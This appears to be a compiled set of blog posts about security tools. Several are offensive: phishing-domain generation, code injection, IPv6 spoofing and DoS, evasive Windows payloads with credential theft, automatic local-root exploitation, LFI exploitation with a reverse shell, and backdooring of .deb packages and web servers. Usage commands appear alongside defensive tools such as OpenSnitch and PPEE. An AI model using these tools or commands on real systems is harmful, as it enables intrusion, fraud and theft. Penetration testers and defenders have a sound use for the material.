
CATPHISH – For Phishing And Corporate Espionage

Project for phishing and corporate espionage.

Current Algorithms

  • SingularOrPluralise
  • prependOrAppend
  • doubleExtensions
  • mirrorization
  • homoglyphs
  • dashOmission
  • Punycode

CATPHISH v.0.0.5
Added more languages. Improved generator code.

CATPHISH v.0.0.4
Added the Punycode algorithm with Vietnamese and Cyrillic character maps.

ruby catphish.rb -d microsoft.com -m Punycode -a

CATPHISH v.0.0.3
Analyzes the target domain to generate similar-looking domains for phishing attacks.


HOW TO USE
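
By analogy with the Punycode example above, the other algorithms can presumably be selected with the -m flag. A sketch (only the Punycode invocation is confirmed by the changelog; the target domain here is an example):

# Generate homoglyph-based lookalike domains for a target domain
# (flags assumed by analogy with the Punycode example above):
ruby catphish.rb -d example.com -m homoglyphs -a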



pyrasite – Inject Code Into Running Python Processes


pyrasite is a Python-based toolkit to inject code into running Python processes.

pyrasite works with Python 2.4 and newer. Injection works between versions as well, so you can run Pyrasite under Python 3 and inject into 2, and vice versa.

Usage
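
A minimal sketch of injecting a payload (the PID and payload file are hypothetical; pyrasite also ships a pyrasite-shell helper for an interactive prompt):

# payload.py - the code to run inside the target process (example payload)
echo 'print("injected!")' > payload.py

# Inject the payload into the Python process with PID 12345
pyrasite 12345 payload.py

# Or obtain an interactive shell inside the running process
pyrasite-shell 12345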

You can download pyrasite here:

pyrasite-2.0.zip

Or read more here.


OpenSnitch – GNU/Linux port of the Little Snitch application firewall

OpenSnitch is a GNU/Linux port of the Little Snitch application firewall.

Requirements
You’ll need a GNU/Linux distribution with iptables, NFQUEUE and ftrace kernel support.

Install

sudo apt-get install build-essential python3-dev python3-setuptools libnetfilter-queue-dev python3-pyqt5 python3-gi python3-dbus python3-pyinotify
cd opensnitch
sudo python3 setup.py install

Run

sudo -HE opensnitchd
opensnitch-qt

Known Issues / Future Improvements
Before opening an issue, keep in mind that the current implementation is just an experiment to test the feasibility of the project. Future improvements of OpenSnitch will include splitting the project into opensnitchd, opensnitch-ui and opensnitch-ruleman:

  • opensnitchd will be a daemon (C++? TBD) running as root with the main logic. It’ll fix this.
  • opensnitch-ui: a Python (?) UI running as a normal user, receiving the daemon’s messages. Will fix this.
  • opensnitch-ruleman: a Python (?) UI for rule editing.


How Does It Work
OpenSnitch is an application-level firewall, meaning that while running, it detects and alerts the user to every outgoing connection created by the applications they run. This can be extremely effective for detecting and blocking unwanted connections on your system that might be caused by a security breach, making data exfiltration much harder for an attacker. To do that, OpenSnitch relies on NFQUEUE, an iptables target/extension which allows a userland program to intercept IP packets and either ALLOW or DROP them. Once started, OpenSnitch installs the following iptables rule:

OUTPUT -t mangle -m conntrack --ctstate NEW -j NFQUEUE --queue-num 0 --queue-bypass


This uses the conntrack iptables extension to pass all newly created connection packets to NFQUEUE number 0 (the one OpenSnitch is listening on), and then:

INPUT --protocol udp --sport 53 -j NFQUEUE --queue-num 0 --queue-bypass

This also redirects DNS responses to OpenSnitch, allowing the software to perform IP -> hostname resolution without issuing active DNS queries itself.
Once a new connection is detected, the software relies on the ftrace kernel extension to track which PID (and therefore which process) is creating the connection.
If ftrace is not available for your kernel, OpenSnitch falls back to using the /proc filesystem. While this method also works, it is vulnerable to application path manipulation as described in this issue, so it is highly recommended to run OpenSnitch on an ftrace-enabled kernel.
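
To check in advance whether your kernel was built with ftrace support (a quick sanity check; the config file location varies by distribution):

grep CONFIG_FTRACE= /boot/config-$(uname -r)
# CONFIG_FTRACE=y means OpenSnitch can use ftrace for PID tracking;
# otherwise it will use the less reliable /proc fallback described above.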


Find Exploits in Local and Online Databases: Findsploit


Findsploit is a simple bash script to quickly and easily search both local and online exploit databases. This repository also includes “copysploit” to copy any exploit-db exploit to the current directory and “compilesploit” to automatically compile and run any C exploit (e.g. ./copysploit 1337.c && ./compilesploit 1337.c).

 

How To Install and Find Exploits

./install.sh

 

Usage

root@kali:/# findsploit heartbleed

   ___ _           _           _       _ _
  / __(_)_ __   __| |___ _ __ | | ___ (_) |_
 / _\ | | '_ \ / _` / __| '_ \| |/ _ \| | __|
/ /   | | | | | (_| \__ \ |_) | | (_) | | |_
\/    |_|_| |_|\__,_|___/ .__/|_|\___/|_|\__|
                        |_|


+ -- --=[findsploit v1.4 by 1N3
+ -- --=[https://crowdshield.com
+ -- --=[SEARCHING: heartbleed

+ -- --=[NMAP SCRIPTS
/usr/share/nmap/scripts/ssl-heartbleed.nse

+ -- --=[METASPLOIT EXPLOITS
msf_search/auxiliary: scanner/ssl/openssl_heartbleed          2014-04-07  normal  OpenSSL Heartbeat (Heartbleed) Information Leak
msf_search/auxiliary: server/openssl_heartbeat_client_memory  2014-04-07  normal  OpenSSL Heartbeat (Heartbleed) Client Memory Exposure

+ -- --=[EXPLOITDB EXPLOITS
Description                                                        Path
------------------------------------------------------------------ -------------------------
Heartbleed OpenSSL - Information Leak Exploit (1)                  /multiple/remote/32791.c
Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support   /multiple/remote/32998.c

+ -- --=[Press any key to search online or Ctrl+C to exit...

https://github.com/1N3/findsploit

 


Security and Privacy Assurance Research: SPARTA Framework


Developed as a part of MIT Lincoln Laboratory’s test and evaluation role in the SPAR (Security and Privacy Assurance Research) program, SPARTA (SPAR Testing and Assessment) framework is a set of software applications used to evaluate the functionality and performance of relational database systems (e.g., MySQL/MariaDB) and messaging systems (e.g., ActiveMQ). These utilities were used to evaluate research prototypes for secure and private information retrieval systems as compared to state-of-the-art open source implementations.

SPARTA includes utilities for test dataset generation (e.g., synthetic SQL databases), test case generation (e.g., SQL queries, publisher/subscriber sets), test execution, system resource monitoring, and test report generation. These utilities can be used to replicate tests executed during SPAR’s test and evaluation, or to evaluate existing relational database and messaging systems. SPARTA can be configured to be a tightly integrated framework that facilitates an entire system evaluation, from the creation of test data to the generation of human-readable test reports.


SPARTA utilities are useful for general software test and evaluation as well, including data structure libraries for high-performance string I/O, generic synthetic dataset generation capabilities, utilities for remote task execution, and more.

 

Top-level Documentation

 

https://github.com/mit-ll/sparta


Embedded Devices CPU Security: Maplesyrup


Maplesyrup is a tool that can be used to help determine the security state of an ARM-based device by examining the system register interface of the CPU.

 

Who is this for?

Maplesyrup is for anyone who has low-level access to a handset or single-board PC running an ARMv7A/v8A based processor and is interested in knowing the register-level configuration of their CPU at OS runtime. These registers contain featureset and security information that may influence the operation of the system kernel and running applications.

 

Why was this created?

Linux provides featureset and platform information to the user in the /proc and /sys filesystems, but the configurations governing how these features operate are sometimes hidden from the user. In some cases, the OS will make use of the information to conform to implementation specific features and not indicate this to the user. In other cases, these features may not be managed by the operating system at all, but could nevertheless affect the operation of the system by configuring how a CPU controls access to security domains, executes specific instructions, and handles CPU exceptions.

 

How does it work?

Maplesyrup consists of a kernel driver and a user mode component. The kernel driver collects the information and returns it to the user mode component which parses the information and presents it to the user.

 

What can I do with the results?

The results will show the low level operating configuration of the system, and can be used to help determine the security state of a device. They may include security settings such as the status of Virtualization Extensions, Security Extensions and coprocessor access restrictions. A few specific examples are listed below:

  • The UWXN and WXN fields within the SCTLR register on ARMv7A based processors will affect how the Execute Never (XN) feature will operate.
  • The Domain Access Control Register (DACR) defines access permissions for each of the 16 memory domain regions.
  • The Coprocessor Access Control Register (CPACR) can be used to determine whether a coprocessor is implemented and what its access controls are.
  • Trap information details the exception level certain exceptions will be taken to and which stack pointer will be used (for AArch64).
  • Debug Architecture access permissions

 

What do the results represent?

The data stored in the system registers may or may not represent how the chip actually operates and the nature of the value is entirely defined by the vendor implementing the device. In addition, some registers will be read at boot time and the results stored to memory. In these cases, manually flipping the bit after the OS has booted will likely not have any effect. Another thing to note is that several registers report information that is relevant to a procedure and may have no further relevance once that procedure has completed.


Features/Limitations

  • Multi-core support
  • Memory-mapped system registers are currently not supported
  • Only EL0/EL1 are supported
  • Support for Cortex A7/A15/A53/A57
  • Support for memory-mapped devices

This application reads only a small portion of the available system registers on an ARM CPU. Please refer to the ARMv7A and ARMv8A Architecture Manuals and the appropriate Cortex TRM for official documentation.

WARNING: This application and kernel module are to be used only on test systems. Leaving the kernel module installed on a non-test system will compromise the system’s security.

 

Platforms Tested

  • Galaxy S5 Exynos Variant
  • ODROID-XU3
  • HOWCHIP 5250 Ver. C
  • Versatile Express-A9 (QEMU)
  • Android Goldfish 3.4 (QEMU)
  • Versatile JUNO Development Platform
  • Raspberry PI 2

 

Requirements

  • Ubuntu 14.04
  • sudo apt-get install libtool autoconf
  • Toolchain for target architecture (if cross compiling) to build usermode and kernel components
    • arm-linux-gnueabi for 32-bit
    • aarch64-linux-gnu for 64-bit
    • arm-linux-androideabi for Android
  • Kernel source tree (required for kernel module build)
  • Linux based device with root access and the ability to load unsigned kernel modules
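
If cross compiling, the build presumably follows the standard autoconf and kernel-module conventions implied by the requirements above. A hedged sketch (paths, directory names and make variables are assumptions, not the project’s documented commands):

# Hypothetical cross-build of the usermode component for 32-bit ARM:
./configure --host=arm-linux-gnueabi
make

# Hypothetical out-of-tree build of the kernel module against the target's
# kernel source tree, using the standard kbuild variables:
make -C /path/to/kernel-src M="$PWD/kmod" ARCH=arm CROSS_COMPILE=arm-linux-gnueabi-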

 

Usage Instructions

Usage: maplesyrup --<register|group|bitfield|all> <NAME or ID> --arch=<ARCH> --impl=<IMPL or all> [--core=<CORE or -1>] [OTHER OPTIONS]

  --arch - armv7a or armv8a
  --impl - cortex-a7, cortex-a15, cortex-a53, cortex-a57, or all
  --core - core number, or -1 for all cores
  --calc - supply register value. Use with --register <regname>
  --help - show this menu
  --group - search by group
  --register - search by register
  --bitfield - search by bitfield
  --all - search all available bitfields
  --noparse - don't parse the results into bitfields
  --showfail - show all results regardless of success
  --el0 - force execution at pl0
  --el1 - force execution at pl1
  --devices - include memory-mapped devices (memory intensive)
  --show_groups - shows all valid functional groups
  --show_bitfields - shows all valid bitfields
  --show_registers - shows all valid registers

Examples:
    (1) maplesyrup --register MIDR --arch=armv7a --impl=all
        to display the MIDR register
    (2) maplesyrup --all --arch=armv7a --impl=all
        to display all registers
    (3) maplesyrup --register MIDR --arch=armv7a --impl=all --calc=0x410fc073
        supply a value

    Sample output
    > maplesyrup --register MIDR --arch=armv7a --impl=all --core=0

    ============================
    || Maplesyrup 1.0         ||
    ||    -linux              ||
    ||    -aarch32            ||
    ||                        ||
    || 000005/000040 entries  ||
    ============================
    [cpu0/cortex-a7/armv7a/1/ident/MIDR/03:00/Revision]: 0x3 (Revision) (0)
    [cpu0/cortex-a7/armv7a/1/ident/MIDR/15:04/Primary part number]: 0xc07 (Primary part number) (0)
    [cpu0/cortex-a7/armv7a/1/ident/MIDR/19:16/Architecture]: 0xf (Architecture) (0)
    [cpu0/cortex-a7/armv7a/1/ident/MIDR/23:20/Variant]: 0x0 (Variant) (0)
    [cpu0/cortex-a7/armv7a/1/ident/MIDR/31:24/Implementer]: 0x41 (Implementer) (0)
    Reading each output line from left to right, the fields are: the core
    number, the part number, the decode table used, the exception level, the
    functional group, the register name, the bitfield size and position, the
    field name, the actual result value, a brief description, and the result
    validity.

 

https://github.com/iadgov/maplesyrup


sylkie: IPv6 Address Spoofing


A command line tool and library for testing IPv6 networks for common address spoofing vulnerabilities that abuse the Neighbor Discovery Protocol.

Dependencies

  • libseccomp
  • json-c

Basic usage

The following describes the basic usage of sylkie. Run sylkie -h or sylkie <subcommand> -h for more details.

DoS (Router Advert)

The basic usage of the sylkie router advert command is listed below. This command sends a Router Advertisement message to the given IP or to the all-nodes multicast address, causing the targeted nodes to remove <router-ip>/<prefix> from their list of default routes.
sylkie ra -i <interface> \
    --target-mac <mac of router> \
    --router-ip <ip of router> \
    --prefix <router prefix> \
    --timeout <time between adverts> \
    --repeat <number of times to send the request>
 

How it works:

The router advert (ra) command attempts to DoS a network by sending “forged” Router Advertisement messages to either a targeted address (if one is provided) or the link-local scope all-nodes address ff02::1. The “forged” Router Advertisement contains Prefix Information with the lifetimes set to 0, and also contains the Source Link-Layer Address. This should cause the targeted address, or all link-local nodes, to remove the targeted router from their list of default routes.
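
For instance, filled in with hypothetical values (interface, MAC and addresses are examples only):

# Advertise router fe80::1 (prefix length 64) as expired on eth0,
# once per second, ten times (all values hypothetical):
sudo sylkie ra -i eth0 \
    --target-mac 52:54:00:12:34:56 \
    --router-ip fe80::1 \
    --prefix 64 \
    --timeout 1 \
    --repeat 10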


Address spoofing (Neighbor Advert)

sylkie na -i <interface> \
    --dst-mac <dest hw addr> \
    --src-ip <source ip> \
    --dst-ip <dest ip address> \
    --target-ip <target ip address> \
    --target-mac <target mac address> \
    --timeout <time between adverts> \
    --repeat <number of times to send the request>
Download Now and start spoofing IPv6 addresses.


Winpayloads – Undetectable Windows Payload Generation


Winpayloads is a tool to provide undetectable Windows payload generation with some extras running on Python 2.7.

It provides persistence, privilege escalation, shellcode invocation and much more.


Features

  • UACBypass – PowerShellEmpire
  • PowerUp – PowerShellEmpire
  • Invoke-Shellcode
  • Invoke-Mimikatz
  • Invoke-EventVwrBypass
  • Persistence – Adds payload persistence on reboot
  • Psexec Spray – Sprays hashes until a successful connection, then psexecs the payload on the target
  • Upload to local webserver – Easy deployment
  • Powershell stager – allows invoking payloads in memory & more

Installation

  1. git clone https://github.com/nccgroup/winpayloads.git
  2. cd winpayloads
  3. ./setup.sh will set up everything needed for Winpayloads
  4. Start Winpayloads: ./Winpayloads.py
  5. Type ‘help’ or ‘?’ to get a detailed help page

You can download Winpayloads here:

Winpayloads-master.zip

Or read more here.



LARE – [L]ocal [A]uto [R]oot [E]xploiter is a Bash Script That Helps You Deploy Local Root Exploits

[L]ocal [A]uto [R]oot [E]xploiter is a simple bash script that helps you deploy local root exploits from your attacking machine when your victim machine does not have internet connectivity.
The script is useful in scenarios where the victim machine has no internet connection, e.g. when you pivot into internal networks, play CTFs that use a VPN to connect to their closed labs (such as hackthebox.gr), or work in the OSCP labs. The script uses local root exploits for Linux kernels 2.6-4.8.
This script is inspired by Nilotpal Biswas’s Auto Root Exploit Tool.

Usage:

1- Attacking a Victim in a Closed Network
First, set up the exploit arsenal on the attacking machine and start the apache2 instance with the following command: bash LARE.sh -a or ./LARE.sh -a

Once done, copy the script to the victim machine by any means available (wget, ftp, curl, etc.) and run the exploiter locally with the following command: bash LARE.sh -l [Attackers-IP] or ./LARE.sh -l [Attackers-IP]
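
Concretely, the two sides of the closed-network workflow look like this (the attacker IP is a hypothetical example):

# On the attacking machine: build the exploit arsenal and serve it via apache2
./LARE.sh -a

# On the victim (after copying LARE.sh over via wget/ftp/curl):
./LARE.sh -l 192.168.1.10   # IP of the attacking machine (example value)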


2- Attacking a Victim with Internet Access
In this scenario the script is run on the victim’s machine, and it fetches the exploits directly from exploit-db’s GitHub repository and uses them for exploitation. This is the original functionality of the Auto Root Exploit Tool with some fine-tuning applied. Run the exploiter with the following command: bash LARE.sh -l or ./LARE.sh -l

Note
The script runs multiple kernel exploits on the machine, which can leave the system unstable. It is highly recommended to use it as a last resort and in a non-production environment.


Gitrob – Reconnaissance Tool for GitHub Organizations

Gitrob is a command line tool which can help organizations and security professionals find sensitive information lingering in publicly available files on GitHub. The tool will iterate over all public organization and member repositories and match filenames against a range of patterns for files that typically contain sensitive or dangerous information.
Looking for sensitive information in GitHub repositories is not a new thing. It has been known for a while that things such as private keys and credentials can be found with GitHub’s search functionality; however, Gitrob makes it easier to focus the effort on a specific organization.
Installation
1. Ruby
Gitrob is written in Ruby and requires version 1.9.3 or above. To check which version of Ruby you have installed, simply run ruby --version in a terminal.
Should you have an older version installed, it is very easy to upgrade and manage different versions with the Ruby Version Manager (RVM). Please see the RVM website for installation instructions.
2. RubyGems
Gitrob is packaged as a Ruby gem to make it easy to install and update. To install Ruby gems you’ll need the RubyGems tool installed. To check if you have it already, type gem in a terminal. If you have it already, it is recommended to do a quick gem update --system to make sure you have the latest and greatest version. In case you don’t have it installed, download it from here and follow the simple installation instructions.
3. PostgreSQL
Gitrob uses a PostgreSQL database to store all the collected data. If you are setting up Gitrob on the Kali Linux distribution you already have it installed; you just need to make sure it’s running by executing service postgresql start and install a dependency with apt-get install libpq-dev in a terminal. Here’s an excellent guide on how to install PostgreSQL on a Debian based Linux system. If you are setting up Gitrob on a Mac, the easiest way to install PostgreSQL is with Homebrew. Here’s a guide on how to install PostgreSQL with Homebrew.

3.1 PostgreSQL user and database
You need to set up a user and a database in PostgreSQL for Gitrob. Execute the following commands in a terminal:

sudo su postgres # Not necessary on Mac OS X
createuser -s gitrob --pwprompt
createdb -O gitrob gitrob

You now have a new PostgreSQL user with the name gitrob and with the password you typed into the prompt. You also created a database with the name gitrob which is owned by the gitrob user.

4. GitHub access tokens
Gitrob works by querying the GitHub API for interesting information, so you need at least one access token to get up and running. The easiest way is to create a Personal Access Token. Press the Generate new token button and give the token a description. If you intend to use Gitrob against organizations you’re not a member of, you don’t need to give the token any scopes, as we will only be accessing public data. If you intend to run Gitrob against your own organization, you’ll need to check the read:org scope to get full coverage.
If you plan on using Gitrob extensively or against a very large organization, it might be necessary to have multiple access tokens to avoid running into rate limiting. These access tokens will have to be from different user accounts.

5. Gitrob
With all the previous steps completed, you can now finally install Gitrob itself with the following command in a terminal:

gem install gitrob

This will install the Gitrob Ruby gem along with all its dependencies. Congratulations!

6. Configuring Gitrob
Gitrob needs to know how to talk to the PostgreSQL database as well as what access token to use to access the GitHub API. Gitrob comes with a convenient configuration wizard which can be invoked with the following command in a terminal:

gitrob configure

The configuration wizard will ask you for the information needed to set up Gitrob. All the information is saved to ~/.gitrobrc (and yes, Gitrob will be looking for this file too, so watch out!)

Usage

Analyzing organizations and users
Analyzing organizations and users is the main feature of Gitrob. The analyze command accepts an arbitrary number of organization and user logins, which will be bundled into an assessment:

gitrob analyze acme,johndoe,janedoe

Mixing organizations and users is convenient if you know that a certain user is part of an organization but their membership is not public.
When the assessment is finished, the analyze command will automatically start up the web server to present the results. This can be avoided by adding the --no-server option to the command.
See gitrob help analyze for more options.

Running Gitrob against custom GitHub Enterprise installations
Gitrob can analyze organizations and users on custom GitHub Enterprise installations instead of the official GitHub site. The analyze command takes several options to control this:

gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2

See gitrob help analyze for more options.

Starting the Gitrob web server
The Gitrob web server can be started with the server command:

gitrob server

By default, the server will listen on localhost:9393. This can, of course, all be controlled:

gitrob server --bind-address=0.0.0.0 --port=8000

See gitrob help server for more options.

Adding custom signatures
If you want to look for files that are specific to your organisation or projects, it is easy to add custom signatures.
When Gitrob starts it looks for a file at ~/.gitrobsignatures which it expects to be a JSON document with signatures that follow the same structure as the main signatures.json file. Here is an example:

[
  {
    "part": "filename",
    "type": "match",
    "pattern": "otr.private_key",
    "caption": "Pidgin OTR private key",
    "description": null
  }
]

This signature instructs Gitrob to flag files where the filename exactly matches otr.private_key. The caption and description are used in the web interface when displaying the findings.

▼Advertisements

Signature keys

  • part: Can be one of:
    • path: The complete file path
    • filename: Only the filename
    • extension: Only the file extension
  • type: Can be one of:
    • match: Simple match of part and pattern
    • regex: Regular expression matching of part and pattern
  • pattern: The value or regular expression to match with
  • caption: A short description of the finding
  • description: More detailed description if needed (set to null if not).

Have a look at the main signatures.json file for more examples of signatures.
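
As a further illustration, a regex-based signature (this pattern is a hypothetical example) would flag any filename containing the word “password”:

[
  {
    "part": "filename",
    "type": "regex",
    "pattern": "\\bpassword\\b",
    "caption": "Filename mentions a password",
    "description": "Hypothetical example signature using regex matching"
  }
]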


AQUATONE – A Tool for Domain Flyovers

AQUATONE is a set of tools for performing reconnaissance on domain names. It can discover subdomains on a given domain by using open sources as well as the more common subdomain dictionary brute force approach. After subdomain discovery, AQUATONE can scan the hosts for common web ports; HTTP headers, HTML bodies and screenshots can then be gathered and consolidated into a report for easy analysis of the attack surface.
Installation
Dependencies
AQUATONE depends on Node.js and the NPM package manager for its web page screenshotting capabilities. Follow this guide for installation instructions.
You will also need a newer version of Ruby installed. If you plan to use AQUATONE in Kali Linux, you are already set up with this. If not, it is recommended to install Ruby with RVM.
Finally, the tool itself can be installed with the following command in a terminal:
$ gem install aquatone
IMPORTANT: AQUATONE’s screenshotting capabilities depend on being run on a system with a graphical desktop environment. It is strongly recommended to install and run AQUATONE in a Kali linux virtual machine. I will not provide support or bug fixing for other systems than Kali Linux.

Usage

Discovery
The first stage of an AQUATONE assessment is the discovery stage where subdomains are discovered on the target domain using open sources, services and the more common dictionary brute force approach:

$ aquatone-discover --domain example.com

aquatone-discover will find the target’s nameservers and shuffle DNS lookups between them. Should a lookup fail on the target domain’s nameservers, aquatone-discover will fall back to using Google’s public DNS servers to maximize discovery. The fallback DNS servers can be changed with the --fallback-nameservers option:

$ aquatone-discover --domain example.com --fallback-nameservers 87.98.175.85,5.9.49.12

Tuning
aquatone-discover will use 5 threads by default for concurrently performing DNS lookups. This provides reasonable performance but can be tuned to be more or less aggressive with the --threads option:

$ aquatone-discover --domain example.com --threads 25

Hammering a DNS server with failing lookups can potentially be picked up by intrusion detection systems, so if that is a concern for you, you can make aquatone-discover a bit more stealthy with the --sleep and --jitter options. --sleep accepts a number of seconds to sleep between each DNS lookup while --jitter accepts a percentage of the --sleep value to randomly add or subtract to or from the sleep interval in order to break the sleep pattern and make it less predictable.

$ aquatone-discover --domain example.com --sleep 5 --jitter 30

Please note that setting the --sleep option will force the thread count to one. The --jitter option will only be considered if the --sleep option has also been set.

API keys
Some of the passive collectors will require API keys or similar credentials in order to work. Setting these values can be done with the --set-key option:

$ aquatone-discover --set-key shodan o1hyw8pv59vSVjrZU3Qaz6ZQqgM91ihQ

All keys will be saved in ~/aquatone/.keys.yml.

Results
When aquatone-discover is finished, it will create a hosts.txt file in the ~/aquatone/<domain> folder, so for a scan of example.com it would be located at ~/aquatone/example.com/hosts.txt. The format will be a comma-separated list of hostnames and their IP, for example:

example.com,93.184.216.34
www.example.com,93.184.216.34
secret.example.com,93.184.216.36
cdn.example.com,192.0.2.42
...

In addition to the hosts.txt file, it will also generate a hosts.json which includes the same information but in JSON format. This format might be preferable if you want to use the information in custom scripts and tools. hosts.json will also be used by the aquatone-scan and aquatone-gather tools.
See aquatone-discover --help for more options.

Scanning
The scanning stage is where AQUATONE will enumerate the discovered hosts for open TCP ports that are commonly used for web services:

$ aquatone-scan --domain example.com

The --domain option will look for hosts.json in the domain’s AQUATONE assessment directory, so in the example above it would look for ~/aquatone/example.com/hosts.json. This file should be present if aquatone-discover --domain example.com has been run previously.

Ports
By default, aquatone-scan will scan the following TCP ports: 80, 443, 8000, 8080 and 8443. These are very common ports for web services and will provide reasonable coverage. Should you want to specify your own list of ports, you can use the --ports option:

$ aquatone-scan --domain example.com --ports 80,443,3000,8080

Instead of a comma-separated list of ports, you can also specify one of the built-in list aliases:

  • small: 80, 443
  • medium: 80, 443, 8000, 8080, 8443 (same as default)
  • large: 80, 81, 443, 591, 2082, 2095, 2096, 3000, 8000, 8001, 8008, 8080, 8083, 8443, 8834, 8888, 55672
  • huge: 80, 81, 300, 443, 591, 593, 832, 981, 1010, 1311, 2082, 2095, 2096, 2480, 3000, 3128, 3333, 4243, 4567, 4711, 4712, 4993, 5000, 5104, 5108, 5280, 5281, 5800, 6543, 7000, 7396, 7474, 8000, 8001, 8008, 8014, 8042, 8069, 8080, 8081, 8083, 8088, 8090, 8091, 8118, 8123, 8172, 8222, 8243, 8280, 8281, 8333, 8337, 8443, 8500, 8834, 8880, 8888, 8983, 9000, 9043, 9060, 9080, 9090, 9091, 9200, 9443, 9800, 9981, 11371, 12443, 16080, 18091, 18092, 20720, 55672

Example:

$ aquatone-scan --domain example.com --ports large

Tuning
Like aquatone-discover, you can make the scanning more or less aggressive with the --threads option which accepts a number of threads for concurrent port scans. The default number of threads is 5.

$ aquatone-scan --domain example.com --threads 25

As aquatone-scan is performing port scanning, it can obviously be picked up by intrusion detection systems. While it will attempt to lessen the risk of detection by randomising hosts and ports, you can tune the stealthiness more with the --sleep and --jitter options, which work just like the similarly named options for aquatone-discover. Keep in mind that setting the --sleep option will force the number of threads to one.

Results
When aquatone-scan is finished, it will create a urls.txt file in the ~/aquatone/<domain> directory, so for a scan of example.com it would be located at ~/aquatone/example.com/urls.txt. The format will be a list of URLs, for example:

http://example.com/
https://example.com/
http://www.example.com/
https://www.example.com/
http://secret.example.com:8001/
https://secret.example.com:8443/
http://cdn.example.com/
https://cdn.example.com/
...

This file can be loaded into other tools such as EyeWitness.
aquatone-scan will also generate a open_ports.txt file, which is a comma-separated list of hosts and their open ports, for example:

93.184.216.34,80,443
93.184.216.34,80
93.184.216.36,80,443,8443
192.0.2.42,80,8080
...

See aquatone-scan --help for more options.

Gathering
The final stage is the gathering part, where the results of the discovery and scanning stages are used to query the discovered web services in order to retrieve and save HTTP response headers and HTML bodies, as well as to take screenshots of how the web pages look in a web browser to make analysis easier. The screenshotting is done with the Nightmare.js Node.js library. This library will be installed automatically if it’s not present on the system.

$ aquatone-gather --domain example.com

aquatone-gather will look for hosts.json and open_ports.txt in the given domain’s AQUATONE assessment directory and request and screenshot every IP address for each domain name for maximum coverage.


Tuning
Like aquatone-discover and aquatone-scan, you can make the gathering more or less aggressive with the --threads option which accepts a number of threads for concurrent requests. The default number of threads is 5.

$ aquatone-gather --domain example.com --threads 25

As aquatone-gather is interacting with web services, it can be picked up by intrusion detection systems. While it will attempt to lessen the risk of detection by randomising hosts and ports, you can tune the stealthiness more with the --sleep and --jitter options, which work just like the similarly named options for aquatone-discover. Keep in mind that setting the --sleep option will force the number of threads to one.

Results
When aquatone-gather is finished, it will have created several directories in the domain’s AQUATONE assessment directory:

  • headers/: Contains text files with HTTP response headers from each web page
  • html/: Contains text files with HTML response bodies from each web page
  • screenshots/: Contains PNG images of what each web page looks like in a browser
  • report/: Contains report files in HTML displaying the gathered information for easy analysis
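
Putting the three stages together, a typical end-to-end assessment looks like this (the domain is a hypothetical example):

# Full AQUATONE flyover of example.com, using the stages described above:
aquatone-discover --domain example.com
aquatone-scan --domain example.com
aquatone-gather --domain example.com
# All results, including the HTML report, land under ~/aquatone/example.com/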

 


Totally Automatic LFI Exploiter & Scanner: LFISuite


LFI Suite is a totally automatic tool able to scan and exploit Local File Inclusion vulnerabilities using many different methods of attack.

 

Features

  • Works with Windows, Linux and OS X
  • Automatic Configuration
  • Automatic Update
  • Provides 8 different Local File Inclusion attack modalities:
    • /proc/self/environ
    • php://filter
    • php://input
    • /proc/self/fd
    • access log
    • phpinfo
    • data://
    • expect://
  • Provides a ninth modality, called Auto-Hack, which scans and exploits the target automatically by trying all the attacks one after the other, without you having to do anything except provide, at the beginning, a list of paths to scan (if you don’t have one, this project’s directory includes two versions, small and huge).
  • Tor proxy support
  • Reverse Shell for Windows, Linux and OS X

 

 


How to use it?

Usage is extremely simple and LFI Suite has an easy-to-use user interface; just run it and let it lead you.

Reverse Shell

When you have obtained an LFI shell by using one of the available attacks, you can easily obtain a reverse shell by entering the command “reverseshell” (obviously you must set your system listening for the reverse connection, for instance using “nc -lvp port”).
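
For example (the port number is arbitrary):

# On the attacking machine, listen for the incoming reverse connection:
nc -lvp 4444

# Then, inside the LFI shell session, request the shell:
reverseshell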

 

Dependencies

  • Python 2.7.x
  • Python extra modules: termcolor, requests
  • socks.py

https://github.com/D35m0nd142/LFISuite


PPEE (Puppy) – Professional PE file Explorer for reversers and malware researchers

There are lots of tools out there for statically analyzing malicious binaries, but they are ordinary tools for ordinary files.
Puppy is a lightweight yet powerful tool for static investigation of suspicious files. A companion plugin is also provided to query the file in well-known malware repositories and obtain one-click technical information about the file, such as its size, entropy, attributes, hashes, version info and so on.
Features
Puppy is robust against malformed and crafted PE files, which makes it handy for reversers, malware researchers and those who want to inspect PE files in more detail. All directories in a PE file, including Export, Import, Resource, Exception, Certificate (relies on Windows API), Base Relocation, Debug, TLS, Load Config, Bound Import, IAT, Delay Import, and CLR, are supported.
  • Both PE32 and PE64 support
  • Examine YARA rules against opened file
  • Virustotal and OPSWAT’s Metadefender query report
  • Statically analyze Windows native and .Net executables
  • Robust Parsing of exe, dll, sys, scr, drv, cpl, ocx and more
  • Edit almost every data structure
  • Easily dump sections, resources and .Net assembly directories
  • Entropy and MD5 calculation of the sections and resource items
  • View strings including URL, Registry, Suspicious, … embedded in files
  • Detect common resource types
  • Extract artifacts remaining in the PE file
  • Anomaly detection
  • Right-click for Copy, Search in web, Whois and dump
  • Built-in hex editor
  • Explorer context menu integration
  • Descriptive information for data members
  • Refresh, Save and Save as menu commands
  • Drag and drop support
  • List view columns can sort data in an appropriate way
  • Open file from command line
  • Checksum validation
  • Plugin enabled


Debinject – Inject malicious code into *.debs


Inject malicious code into *.debs

CLONE

git clone https://github.com/UndeadSec/Debinject.git

RUNNING

cd Debinject
python debinject.py

If you have another version of Python:

python2.7 debinject.py

RUN ON TARGET SIDE
chmod 755 default.deb
dpkg -i backdoored.deb

PREREQUISITES

  • dpkg
  • dpkg-deb
  • metasploit


TESTED ON

  • Kali Linux – SANA
  • Kali Linux – ROLLING

 


GShark Framework – Check all your backdoors with only one telegram account


This framework can perform web post-exploitation; with it you can interact with multiple web backdoors and execute custom modules and scripts.
Check all your backdoors with only one Telegram Messenger account!

  • Connect web backdoor to master server and control it with Telegram
  • Download visual backdoor on selected target
  • Execute custom module or PHP code in selected target
  • Run multiple integrated commands in GShark
  • Generate an obfuscated GShark Executor backdoor
  • Configure a proxy on the master server for communicating with all backdoors (Proxy**)
  • Generate new backdoor source after interaction (AutoGenerate**)
  • More …

▼Advertisements

** Configuration with /config


 



Build Legacy-Free OS Images: mkosi


A fancy wrapper around dnf --installroot, debootstrap, pacstrap and zypper that may generate disk images with a number of bells and whistles.

